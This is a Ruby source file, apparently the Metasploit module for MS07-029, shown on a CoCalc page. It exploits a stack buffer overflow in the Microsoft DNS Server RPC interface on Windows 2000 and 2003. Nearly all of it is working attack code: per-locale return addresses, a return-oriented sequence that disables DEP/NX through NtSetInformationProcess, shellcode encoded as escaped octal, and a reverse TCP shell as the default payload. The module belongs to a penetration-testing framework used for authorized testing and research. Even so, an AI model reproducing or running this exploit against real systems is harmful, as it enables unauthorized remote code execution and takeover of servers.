CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::DCERPC910def initialize(info = {})11super(update_info(info,12'Name' => 'MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)',13'Description' => %q{14This module exploits a stack buffer overflow in the RPC interface15of the Microsoft DNS service. The vulnerability is triggered16when a long zone name parameter is supplied that contains17escaped octal strings. This module is capable of bypassing NX/DEP18protection on Windows 2003 SP1/SP2.19},20'Author' =>21[22'hdm', # initial module23'Unknown', # 2 unknown contributors (2003 support)24'bcoles' # additional target offsets25],26'License' => MSF_LICENSE,27'References' =>28[29['CVE', '2007-1748'],30['OSVDB', '34100'],31['MSB', 'MS07-029']32],33'Privileged' => true,34'DefaultOptions' =>35{36'EXITFUNC' => 'thread',37'PAYLOAD' => 'windows/shell/reverse_tcp'38},39'Payload' =>40{41'Space' => 500,4243# The payload doesn't matter, but make_nops() uses these too44'BadChars' => "\x00",4546'StackAdjustment' => -3500,4748},49'Platform' => 'win',50'Targets' =>51[52[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],5354# p/p/r WS2HELP.DLL55[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],56[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],57[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],58[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],59[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],60[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],61[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],62[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],63[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],64[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],65[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],66[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],67[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],6869# Use the __except_handler3 method (and jmp esp in ATL.dll)70[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],71[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],7273# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)74[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],75[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],76[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],77[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],78[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],79[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],80[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],81],82'DisclosureDate' => '2007-04-12',83'DefaultTarget' => 0 ))8485register_options(86[87Opt::RPORT(0),88OptString.new('Locale', [ true, "Locale for automatic target (English, French, Italian, ...)", 'English'])89])90end919293def gettarget(os)9495targets.each do |target|96if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/))97return target98end99end100101return nil102end103104105def exploit106107108# Ask the endpoint mapper to locate the port for us109dport = datastore['RPORT'].to_i110111if ((dport != 0) && (target.name =~ /Automatic/))112print_error("Unable to use automatic targeting when RPORT is given");113return114end115116if (dport == 0)117118dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp')119120if (not dport)121print_error("Could not determine the RPC port used by the Microsoft DNS Server")122return123end124125print_status("Discovered Microsoft DNS Server RPC service on port #{dport}")126end127128129mytarget = nil130131if (target.name =~ /Automatic/)132133# scheduler service is only available on 2k3 SP0 and 2000134schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '1ff70682-0a51-30e8-076d-740be8cee98b', '1.0', 'ncacn_ip_tcp')135136if (not schedport)137print_status("Detected a Windows 2003 SP1-SP2 target...")138mytarget = gettarget('2003SP12')139else140# only available on 2003 SP0141schedport = dcerpc_endpoint_find_tcp(datastore['RHOST'], '0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53', '1.0', 'ncacn_ip_tcp')142143if (not schedport)144print_status("Detected a Windows 2000 SP0-SP4 target...")145mytarget = gettarget('2000')146else147print_status("Detected a Windows 2003 SP0 target...")148mytarget = gettarget('2003SP0')149end150end151152if (not mytarget)153fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")154end155else156mytarget = target157end158159160161# Connect to the high RPC port162connect(true, { 'RPORT' => dport })163print_status("Trying target #{mytarget.name}...")164165# Bind to the service166handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])167print_status("Binding to #{handle} ...")168dcerpc_bind(handle)169print_status("Bound to #{handle} ...")170171# Create our buffer with our shellcode first172txt = Rex::Text.rand_text_alphanumeric(8192)173174if (mytarget['OS'] =~ /2000/)175txt[0, payload.encoded.length] = payload.encoded176177off = mytarget['Off']178txt[ off ] = [mytarget.ret].pack('V')179txt[ off - 4, 2] = "\xeb\x06"180txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')181182elsif (mytarget['OS'] =~ /2003SP0/)183txt[0, payload.encoded.length] = payload.encoded184185off = mytarget['Off']186txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3187txt[ off - 4, 2] = "\xeb\x16"188189# addr = A + B*12 + 4 = 0x77f7e7f0 (ntdll -> 0x77f443c9)190addr = mytarget['Rets'][1] - 4191addr1 = addr / 2192addr2 = addr1 + addr % 2193addr1 = addr1 + (addr2 % 12)194addr2 = addr2 / 12195196txt[ off + 4, 8] = [addr1, addr2].pack('VV') # A,B197198#199# then mov eax, [addr] sets eax to 0x77f443c9 and the code goes here :200#201# 0x77f443c9 jmp off_77f7e810[edx*4] ; edx = 0 so jmp to 77f443d0202# 0x77f443d0 mov eax, [ebp+arg_0]203# 0x77f443d3 pop esi204# 0x77f443d4 pop edi205# 0x77f443d5 leave ; mov esp, ebp206# 0x77f443d6 retn ; ret207208txt[ off + 16, 4] = [mytarget['Rets'][2]].pack('V') # jmp esp209txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V')210211elsif (mytarget['OS'] =~ /2003SP12/)212off = mytarget['Off']213ib = mytarget['IB']214txt[ off ] = [ib + 0x2566].pack('V')215216217# to bypass NX we need to emulate the call to ZwSetInformationProcess218# with generic value (to work on SP1-SP2 + patches)219220off = 445221222# first we set esi to 0xed by getting the value on the stack223#224# 0x76a81da7:225# pop esi <- esi = edh226# retn227228txt[ off + 4, 4 ] = [ib + 0x1da7].pack('V')229txt[ off + 28, 4] = [0xed].pack('V')230231# now we set ecx to 0x7ffe0300, eax to 0xed232# 0x76a81da4:233# pop ecx <- ecx = 0x7ffe0300234# mov eax, esi <- eax == edh235# pop esi236# retn237238txt[ off + 32, 4] = [ib + 0x1da4].pack('V')239txt[ off + 36, 4] = [0x7ffe0300].pack('V')240241# finally we call NtSetInformationProcess (-1, 34, 0x7ffe0270, 4)242# 0x7FFE0270 is a pointer to 0x2 (os version info :-) to disable NX243# 0x76a8109c:244# call dword ptr [ecx]245246txt[ off + 44, 4] = [ib + 0x109c].pack('V') # call dword ptr[ecx]247txt[ off + 52, 16] = [-1, 34, 0x7FFE0270, 4].pack('VVVV')248249# we catch the second exception to go back to our shellcode, now that250# NX is disabled251252off = 1013253txt[ off, 4 ] = [ib + 0x135bf].pack('V') # (jmp esp in atl.dll)254txt[ off + 24, payload.encoded.length ] = payload.encoded255256end257258req = ''259260# Convert the string to escaped octal261txt.unpack('C*').each do |c|262req << "\\"263req << c.to_s(8)264end265266# Build the RPC stub data267stubdata =268NDR.long(rand(0xffffffff)) +269NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") +270271NDR.long(rand(0xffffffff)) +272NDR.string(req + "\x00") +273274NDR.long(rand(0xffffffff)) +275NDR.string(Rex::Text.rand_text_alpha(1) + "\x00")276277print_status('Sending exploit...')278279begin280response = dcerpc.call(1, stubdata)281282if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)283print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])284end285rescue ::Exception => e286print_error("Error: #{e}")287end288289handler290disconnect291end292end293294295